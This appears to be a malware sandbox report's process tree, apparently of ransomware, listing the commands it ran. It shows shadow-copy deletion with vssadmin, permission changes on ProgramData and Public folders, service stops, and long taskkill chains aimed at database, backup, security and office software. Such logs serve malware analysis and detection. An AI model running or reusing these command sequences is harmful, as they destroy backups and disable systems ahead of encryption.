C:\Windows\SysWOW64\takeown.exetakeown /f C:\ProgramData /a4⤵
- Modifies file permissions
PID:912
-
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /g Users:r4⤵PID:456
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:2028
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1488
-
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d SERVICE4⤵PID:1392
-
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /g Administrators:r4⤵PID:1580
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1168
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop Realtek11nSU5⤵PID:684
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:996
-
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d mssqlserver4⤵PID:1060
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1108
-
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d "network service"4⤵PID:1836
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:108
-
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d mssql$sqlexpress4⤵PID:292
-
-
C:\Windows\SysWOW64\cacls.execacls C:\ProgramData /e /d system4⤵PID:1736
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1724
-
-
C:\Windows\SysWOW64\takeown.exetakeown /f C:\Users\Public /a4⤵
- Modifies file permissions
PID:1564
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /g Administrators:f4⤵PID:1016
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:720
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1788
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /g Administrators:r4⤵PID:1948
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /g Users:r4⤵PID:792
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:1612
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d SERVICE4⤵PID:224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:216
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d "network service"4⤵PID:1832
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:1728
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d mssqlserver4⤵PID:1640
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:236
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d system4⤵PID:848
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo y"4⤵PID:112
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Users\Public /e /d mssql$sqlexpress4⤵PID:1880
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"4⤵PID:556
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "igfxCUIService2.0.0.0"5⤵PID:1864
-
-
-
C:\Windows\SysWOW64\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
PID:1388
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color e & @taskkill /IM pg_ctl.exe /F & @taskkill /IM rcrelay.exe /F & @taskkill /IM SogouImeBroker.exe /F & @taskkill /IM CCenter.exe /F & @taskkill /IM ScanFrm.exe /F & @taskkill /IM d_manage.exe /F & @taskkill /IM RsTray.exe /F & @taskkill /IM wampmanager.exe /F & @taskkill /IM RavTray.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM sqlmangr.exe /F & @taskkill /IM msftesql.exe /F & @taskkill /IM SyncBaseSvr.exe /F & @taskkill /IM oracle.exe /F & @taskkill /IM TNSLSNR.exe /F & @taskkill /IM SyncBaseConsole.exe /F & @taskkill /IM aspnet_state.exe /F & @taskkill /IM AutoBackUpEx.exe /F & @taskkill /IM redis-server.exe /F & @taskkill /IM MySQLNotifier.exe /F & @taskkill /IM oravssw.exe /F & @taskkill /IM fppdis5.exe /F & @taskkill /IM His6Service.exe /F & @taskkill /IM dinotify.exe /F & @taskkill /IM JhTask.exe /F & @taskkill /IM Executer.exe /F & @taskkill /IM AllPassCBHost.exe /F & @taskkill /IM ap_nginx.exe /F & @taskkill /IM AndroidServer.exe /F & @taskkill /IM XT.exe /F & @taskkill /IM XTService.exe /F & @taskkill /IM AllPassMCService.exe /F & @taskkill /IM IMEDICTUPDATE.exe /F & @taskkill /IM FlashHelperService.exe /F & @taskkill /IM ap_redis-server.exe /F & @taskkill /IM UtilDev.WebServer.Monitor.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM FoxitProtect.exe /F & @taskkill /IM ftnlses.exe /F & @taskkill /IM ftusbrdwks.exe /F & @taskkill /IM ftusbrdsrv.exe /F & @taskkill /IM ftnlsv.exe /F & @taskkill /IM Syslogd_Service.exe /F & @taskkill /IM UWS.HighPrivilegeUtilities.exe /F & @taskkill /IM ftusbsrv.exe /F & @taskkill /IM UWS.LowPrivilegeUtilities.exe /F & @taskkill /IM UWS.AppHost.Clr2.AnyCpu.exe /F & @taskkill /IM winguard_x64.exe /F & @taskkill /IM vmconnect.exe /F & @taskkill /IM UWS.AppHost.Clr2.x86.exe /F & @taskkill /IM firefox.exe /F & @taskkill /IM usbrdsrv.exe /F & @taskkill /IM usbserver.exe /F & @taskkill /IM Foxmail.exe /F & @taskkill /IM qemu-ga.exe /F & @taskkill /IM wwbizsrv.exe /F & @taskkill /IM ZTEFileTranS.exe /F & @taskkill /IM ZTEUsbIpc.exe /F & @taskkill /IM ZTEUsbIpcGuard.exe /F & @taskkill /IM AlibabaProtect.exe /F & @taskkill /IM kbasesrv.exe /F & @taskkill /IM ZTEVdservice.exe /F & @taskkill /IM MMRHookService.exe /F & @taskkill /IM extjob.exe /F & @taskkill /IM IpOverUsbSvc.exe /F & @taskkill /IM VMwareTray.exe /F & @taskkill /IM devenv.exe /F & @taskkill /IM PerfWatson2.exe /F & @taskkill /IM ServiceHub.Host.Node.x86.exe /F & @taskkill /IM ServiceHub.IdentityHost.exe /F & @taskkill /IM ServiceHub.VSDetouredHost.exe /F & @taskkill /IM ServiceHub.SettingsHost.exe /F & @taskkill /IM ServiceHub.Host.CLR.x86.exe /F & @taskkill /IM ServiceHub.RoslynCodeAnalysisService32.exe /F & @taskkill /IM ServiceHub.DataWarehouseHost.exe /F & @taskkill /IM Microsoft.VisualStudio.Web.Host.exe /F & @taskkill /IM SQLEXPRWT.exe /F & @taskkill /IM setup.exe /F & @taskkill /IM remote.exe /F & @taskkill /IM setup100.exe /F & @taskkill /IM landingpage.exe /F & @taskkill /IM WINWORD.exe /F & @taskkill /IM KuaiYun.exe /F & @taskkill /IM HwsHostPanel.exe /F & @taskkill /IM NovelSpider.exe /F & @taskkill /IM Service_KMS.exe /F & @taskkill /IM WebServer.exe /F & @taskkill /IM ChsIME.exe /F & @taskkill /IM btPanel.exe /F & @taskkill /IM Protect_2345Explorer.exe /F & @taskkill /IM Pic_2345Svc.exe /F & @taskkill /IM vmware-converter-a.exe /F & @taskkill /IM vmware-converter.exe /F & @taskkill /IM vmware.exe /F & @taskkill /IM vmware-unity-helper.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM vmware-vmx.exe /F & @taskkill /IM usysdiag.exe /F & @taskkill /IM PopBlock.exe /F & @taskkill /IM gsinterface.exe /F & @taskkill /IM Gemstar.Group.CRS.Client.exe /F & @taskkill /IM TenpayServer.exe /F & @taskkill /IM RemoteExecService.exe /F & @taskkill /IM VS_TrueCorsManager.exe /F & @taskkill /IM ntpsvr-2019-01-22-wgs84.exe /F & @taskkill /IM rtkjob-ion.exe /F & @taskkill /IM ntpsvr-2019-01-22-no-usrcheck.exe /F & @taskkill /IM NtripCaster-2019-01-08.exe /F & @taskkill /IM BACSTray.exe /F & @taskkill /IM protect.exe /F & @taskkill /IM hfs.exe /F & @taskkill /IM jzmis.exe /F & @taskkill /IM NewFileTime_x64.exe /F & @taskkill /IM 2345MiniPage.exe /F & @taskkill /IM JMJ_server.exe /F & @taskkill /IM cacls.exe /F & @taskkill /IM gpsdaemon.exe /F & @taskkill /IM gpsusersvr.exe /F & @taskkill /IM gpsdownsvr.exe /F & @taskkill /IM gpsstoragesvr.exe /F & @taskkill /IM gpsdataprocsvr.exe /F & @taskkill /IM gpsftpd.exe /F & @taskkill /IM gpsmysqld.exe /F & @taskkill /IM gpstomcat6.exe /F & @taskkill /IM gpsloginsvr.exe /F & @taskkill /IM gpsmediasvr.exe /F & @taskkill /IM gpsgatewaysvr.exe /F & @taskkill /IM gpssvrctrl.exe /F & @taskkill /IM zabbix_agentd.exe /F"4⤵PID:1724
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM pg_ctl.exe /F5⤵PID:1056
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM rcrelay.exe /F5⤵PID:2940
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SogouImeBroker.exe /F5⤵
- Kills process with taskkill
PID:684
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM CCenter.exe /F5⤵PID:2196
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ScanFrm.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2484
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM d_manage.exe /F5⤵PID:2800
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM RsTray.exe /F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1732
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM wampmanager.exe /F5⤵PID:2092
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM RavTray.exe /F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1120
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM mssearch.exe /F5⤵PID:2160
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sqlmangr.exe /F5⤵PID:2904
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM msftesql.exe /F5⤵
- Kills process with taskkill
PID:1824
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SyncBaseSvr.exe /F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2800
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM oracle.exe /F5⤵PID:2856
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TNSLSNR.exe /F5⤵PID:2604
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SyncBaseConsole.exe /F5⤵PID:1168
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM aspnet_state.exe /F5⤵PID:2592
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM AutoBackUpEx.exe /F5⤵PID:2216
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM redis-server.exe /F5⤵
- Kills process with taskkill
PID:2864
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM MySQLNotifier.exe /F5⤵PID:1732
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM oravssw.exe /F5⤵PID:2372
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM fppdis5.exe /F5⤵PID:1824
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM His6Service.exe /F5⤵PID:2168
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Bonjour Service"6⤵PID:848
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM dinotify.exe /F5⤵
- Kills process with taskkill
PID:836
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM JhTask.exe /F5⤵PID:3020
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Executer.exe /F5⤵PID:2180
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM AllPassCBHost.exe /F5⤵PID:2560
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ap_nginx.exe /F5⤵PID:2976
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM AndroidServer.exe /F5⤵
- Kills process with taskkill
PID:3060
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM XT.exe /F5⤵PID:2684
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM XTService.exe /F5⤵PID:572
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM AllPassMCService.exe /F5⤵PID:2168
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM IMEDICTUPDATE.exe /F5⤵PID:2092
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color e & @taskkill /IM BackupExec.exe /F & @taskkill /IM Att.exe /F & @taskkill /IM mdm.exe /F & @taskkill /IM BackupExecManagementService.exe /F & @taskkill /IM bengine.exe /F & @taskkill /IM benetns.exe /F & @taskkill /IM beserver.exe /F & @taskkill /IM pvlsvr.exe /F & @taskkill /IM bedbg.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM beremote.exe /F & @taskkill /IM RemoteAssistProcess.exe /F & @taskkill /IM BarMoniService.exe /F & @taskkill /IM GoodGameSrv.exe /F & @taskkill /IM BarCMService.exe /F & @taskkill /IM TsService.exe /F & @taskkill /IM GoodGame.exe /F & @taskkill /IM BarServerView.exe /F & @taskkill /IM IcafeServicesTray.exe /F & @taskkill /IM BsAgent_0.exe /F & @taskkill /IM ControlServer.exe /F & @taskkill /IM DisklessServer.exe /F & @taskkill /IM DumpServer.exe /F & @taskkill /IM NetDiskServer.exe /F & @taskkill /IM PersonUDisk.exe /F & @taskkill /IM service_agent.exe /F & @taskkill /IM SoftMemory.exe /F & @taskkill /IM BarServer.exe /F & @taskkill /IM RtkNGUI64.exe /F & @taskkill /IM Serv-U-Tray.exe /F & @taskkill /IM QQPCSoftTrayTips.exe /F & @taskkill /IM SohuNews.exe /F & @taskkill /IM Serv-U.exe /F & @taskkill /IM QQPCRTP.exe /F & @taskkill /IM EasyFZS.exe /F & @taskkill /IM HaoYiShi.exe /F & @taskkill /IM HysMySQL.exe /F & @taskkill /IM wtautoreg.exe /F & @taskkill /IM ispiritPro.exe /F & @taskkill /IM CAService.exe /F & @taskkill /IM XAssistant.exe /F & @taskkill /IM TrustCA.exe /F & @taskkill /IM GEUU20003.exe /F & @taskkill /IM CertMgr.exe /F & @taskkill /IM eSafe_monitor.exe /F & @taskkill /IM MainExecute.exe /F & @taskkill /IM FastInvoice.exe /F & @taskkill /IM SoftMgrLite.exe /F & @taskkill /IM sesvc.exe /F & @taskkill /IM ScanFileServer.exe /F & @taskkill /IM Nuoadehgcgcd.exe /F & @taskkill /IM OpenFastAssist.exe /F & @taskkill /IM FastInvoiceAssist.exe /F & @taskkill /IM Nuoadfaggcje.exe /F & @taskkill /IM OfficeUpdate.exe /F & @taskkill /IM atkexComSvc.exe /F & @taskkill /IM FileTransferAgent.exe /F & @taskkill /IM MasterReplicatorAgent.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmAsyncService.exe /F & @taskkill /IM CrmUnzipService.exe /F & @taskkill /IM NscAuthService.exe /F & @taskkill /IM ReplicaReplicatorAgent.exe /F & @taskkill /IM ASMCUSvc.exe /F & @taskkill /IM OcsAppServerHost.exe /F & @taskkill /IM RtcCdr.exe /F & @taskkill /IM IMMCUSvc.exe /F & @taskkill /IM DataMCUSvc.exe /F & @taskkill /IM MeetingMCUSvc.exe /F & @taskkill /IM QmsSvc.exe /F & @taskkill /IM RTCSrv.exe /F & @taskkill /IM pnopagw.exe /F & @taskkill /IM NscAuth.exe /F & @taskkill /IM Microsoft.ActiveDirectory.WebServices.exe /F & @taskkill /IM DistributedCacheService.exe /F & @taskkill /IM c2wtshost.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Calculation.exe /F & @taskkill /IM schedengine.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Eventing.exe /F & @taskkill /IM Microsoft.Office.Project.Server.Queuing.exe /F & @taskkill /IM WSSADMIN.EXE /F & @taskkill /IM hostcontrollerservice.exe /F & @taskkill /IM noderunner.exe /F & @taskkill /IM OWSTIMER.EXE /F & @taskkill /IM wsstracing.exe /F & @taskkill /IM mssearch.exe /F & @taskkill /IM MySQLInstallerConsole.exe /F & @taskkill /IM EXCEL.EXE /F & @taskkill /IM consent.exe /F & @taskkill /IM RtkAudioService64.exe /F & @taskkill /IM RAVBg64.exe /F & @taskkill /IM FNPLicensingService64.exe /F & @taskkill /IM VisualSVNServer.exe /F & @taskkill /IM MotionBoard57.exe /F & @taskkill /IM MotionBoardRCService57.exe /F & @taskkill /IM LPManService.exe /F & @taskkill /IM RaRegistry.exe /F & @taskkill /IM RaAutoInstSrv.exe /F & @taskkill /IM RtHDVCpl.exe /F & @taskkill /IM DefenderDaemon.exe /F & @taskkill /IM BestSyncApp.exe /F & @taskkill /IM ApUI.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM LPManNotifier.exe /F & @taskkill /IM FieldAnalyst.exe /F & @taskkill /IM TimingGenerate.exe /F & @taskkill /IM Detector.exe /F & @taskkill /IM Estimator.exe /F & @taskkill /IM FA_Logwriter.exe /F & @taskkill /IM TrackingSrv.exe /F & @taskkill /IM cbInterface.exe /F & @taskkill /IM EnterprisePortal.exe /F & @taskkill /IM ccbService.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM U8DispatchService.exe /F & @taskkill /IM dbsrv16.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM KICManager.exe /F & @taskkill /IM KICMain.exe /F & @taskkill /IM ServerManagerLauncher.exe /F & @taskkill /IM TbossGate.exe /F & @taskkill /IM iusb3mon.exe /F & @taskkill /IM MgrEnvSvc.exe /F & @taskkill /IM Mysoft.Config.WindowsService.exe /F & @taskkill /IM Mysoft.UpgradeService.UpdateService.exe /F & @taskkill /IM hasplms.exe /F & @taskkill /IM Mysoft.Setup.InstallService.exe /F & @taskkill /IM Mysoft.UpgradeService.Dispatcher.exe /F & @taskkill /IM Mysoft.DataCenterService.WindowsHost.exe /F & @taskkill /IM Mysoft.DataCenterService.DataCleaning.exe /F & @taskkill /IM Mysoft.DataCenterService.DataTracking.exe /F & @taskkill /IM Mysoft.SchedulingService.WindowsHost.exe /F & @taskkill /IM ServiceMonitor.exe /F & @taskkill /IM Mysoft.SchedulingService.ExecuteEngine.exe /F & @taskkill /IM AgentX.exe /F & @taskkill /IM host.exe /F & @taskkill /IM AutoUpdate.exe /F & @taskkill /IM vsjitdebugger.exe /F"4⤵PID:1736
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BackupExec.exe /F5⤵PID:1884
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Att.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2932
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM mdm.exe /F5⤵PID:1948
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BackupExecManagementService.exe /F5⤵PID:2552
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM bengine.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1884
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM benetns.exe /F5⤵
- Kills process with taskkill
PID:2124
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM beserver.exe /F5⤵
- Kills process with taskkill
PID:2072
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM pvlsvr.exe /F5⤵PID:1392
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM bedbg.exe /F5⤵PID:2948
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM beremote.exe /F5⤵PID:2224
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM beremote.exe /F5⤵PID:2508
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM beremote.exe /F5⤵PID:3016
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop d_safe6⤵PID:2080
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM beremote.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1056
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM RemoteAssistProcess.exe /F5⤵PID:3008
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BarMoniService.exe /F5⤵
- Kills process with taskkill
PID:2388
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM GoodGameSrv.exe /F5⤵PID:2860
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BarCMService.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1392
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM TsService.exe /F5⤵PID:2140
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM GoodGame.exe /F5⤵PID:2436
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BarServerView.exe /F5⤵PID:2376
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM IcafeServicesTray.exe /F5⤵
- Kills process with taskkill
PID:2444
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BsAgent_0.exe /F5⤵PID:2092
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ControlServer.exe /F5⤵PID:1304
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM DisklessServer.exe /F5⤵PID:2952
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM DumpServer.exe /F5⤵PID:3040
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM NetDiskServer.exe /F5⤵PID:2104
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM PersonUDisk.exe /F5⤵PID:2480
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM service_agent.exe /F5⤵PID:1328
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM SoftMemory.exe /F5⤵PID:3044
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM BarServer.exe /F5⤵PID:2396
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM RtkNGUI64.exe /F5⤵PID:1268
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM Serv-U-Tray.exe /F5⤵PID:2096
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c "color e & @taskkill /IM ThunderPlatform.exe /F & @taskkill /IM iexplore.exe /F & @taskkill /IM vm-agent.exe /F & @taskkill /IM vm-agent-daemon.exe /F & @taskkill /IM eSightService.exe /F & @taskkill /IM cygrunsrv.exe /F & @taskkill /IM wrapper.exe /F & @taskkill /IM nginx.exe /F & @taskkill /IM node.exe /F & @taskkill /IM sshd.exe /F & @taskkill /IM vm-tray.exe /F & @taskkill /IM iempwatchdog.exe /F & @taskkill /IM sqlwriter.exe /F & @taskkill /IM php.exe /F & @taskkill /IM "notepad++.exe" /F & @taskkill /IM "phpStudy.exe" /F & @taskkill /IM OPCClient.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM SupportAssistAgent.exe /F & @taskkill /IM SunloginClient.exe /F & @taskkill /IM SOUNDMAN.exe /F & @taskkill /IM WeChat.exe /F & @taskkill /IM TXPlatform.exe /F & @taskkill /IM Tencentdll.exe /F & @taskkill /IM httpd.exe /F & @taskkill /IM jenkins.exe /F & @taskkill /IM QQ.exe /F & @taskkill /IM HaoZip.exe /F & @taskkill /IM HaoZipScan.exe /F & @taskkill /IM navicat.exe /F & @taskkill /IM TSVNCache.exe /F & @taskkill /IM RAVCpl64.exe /F & @taskkill /IM secbizsrv.exe /F & @taskkill /IM aliwssv.exe /F & @taskkill /IM Helper_Haozip.exe /F & @taskkill /IM acrotray.exe /F & @taskkill /IM "FileZilla Server Interface.exe" /F & @taskkill /IM YoudaoNote.exe /F & @taskkill /IM YNoteCefRender.exe /F & @taskkill /IM idea.exe /F & @taskkill /IM fsnotifier.exe /F & @taskkill /IM picpick.exe /F & @taskkill /IM lantern.exe /F & @taskkill /IM sysproxy-cmd.exe /F & @taskkill /IM service.exe /F & @taskkill /IM pcas.exe /F & @taskkill /IM PresentationFontCache.exe /F & @taskkill /IM RtWlan.exe /F & @taskkill /IM monitor.exe /F & @taskkill /IM Correspond.exe /F & @taskkill /IM ChatServer.exe /F & @taskkill /IM InetMgr.exe /F & @taskkill /IM LogonServer.exe /F & @taskkill /IM GameServer.exe /F & @taskkill /IM ServUAdmin.exe /F & @taskkill /IM ServUDaemon.exe /F & @taskkill /IM update0.exe /F & @taskkill /IM server.exe /F & @taskkill /IM w3wp.exe /F & @taskkill /IM notepad.exe /F & @taskkill /IM PalmInputService.exe /F & @taskkill /IM PalmInputGuard.exe /F & @taskkill /IM UpdateServer.exe /F & @taskkill /IM UpdateGate.exe /F & @taskkill /IM DBServer.exe /F & @taskkill /IM LoginGate.exe /F & @taskkill /IM SelGate.exe /F & @taskkill /IM RunGate.exe /F & @taskkill /IM M2Server.exe /F & @taskkill /IM LogDataServer.exe /F & @taskkill /IM LoginSrv.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM mqsvc.exe /F & @taskkill /IM RefundOrder.exe /F & @taskkill /IM ClamTray.exe /F & @taskkill /IM AdobeARM.exe /F & @taskkill /IM veeam.backup.shell.exe /F & @taskkill /IM VpxClient.exe /F & @taskkill /IM vmware-vmrc.exe /F & @taskkill /IM DSCPatchService.exe /F & @taskkill /IM scktsrvr.exe /F & @taskkill /IM ServerManager.exe /F & @taskkill /IM Dispatcher.exe /F & @taskkill /IM EFDispatcher.exe /F & @taskkill /IM ClamWin.exe /F & @taskkill /IM srvany.exe /F & @taskkill /IM JT_AG-8332.exe /F & @taskkill /IM XXTClient.exe /F & @taskkill /IM clean.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM "Net.Service.exe" /F & @taskkill /IM plsqldev.exe /F & @taskkill /IM splwow64.exe /F & @taskkill /IM Oobe.exe /F & @taskkill /IM QQYService.exe /F & @taskkill /IM sqlservr.exe /F & @taskkill /IM SGTool.exe /F & @taskkill /IM postgres.exe /F & @taskkill /IM AppVShNotify.exe /F & @taskkill /IM OfficeClickToRun.exe /F & @taskkill /IM EntDT.exe /F & @taskkill /IM EntPublish.exe /F"4⤵PID:996
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM ThunderPlatform.exe /F5⤵PID:1780
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM iexplore.exe /F5⤵PID:2924
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM vm-agent.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
PID:228
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM vm-agent-daemon.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2240
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM eSightService.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2368
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM cygrunsrv.exe /F5⤵PID:2852
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM wrapper.exe /F5⤵PID:2984
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM nginx.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2444
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM node.exe /F5⤵PID:2132
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sshd.exe /F5⤵PID:2228
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM vm-tray.exe /F5⤵PID:2384
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM iempwatchdog.exe /F5⤵PID:2600
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM sqlwriter.exe /F5⤵PID:3024
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM php.exe /F5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2132
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM "notepad++.exe" /F5⤵PID:2568
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM "phpStudy.exe" /F5⤵PID:2468
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM OPCClient.exe /F5⤵PID:2688
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /IM navicat.exe /F5⤵PID:1568
-
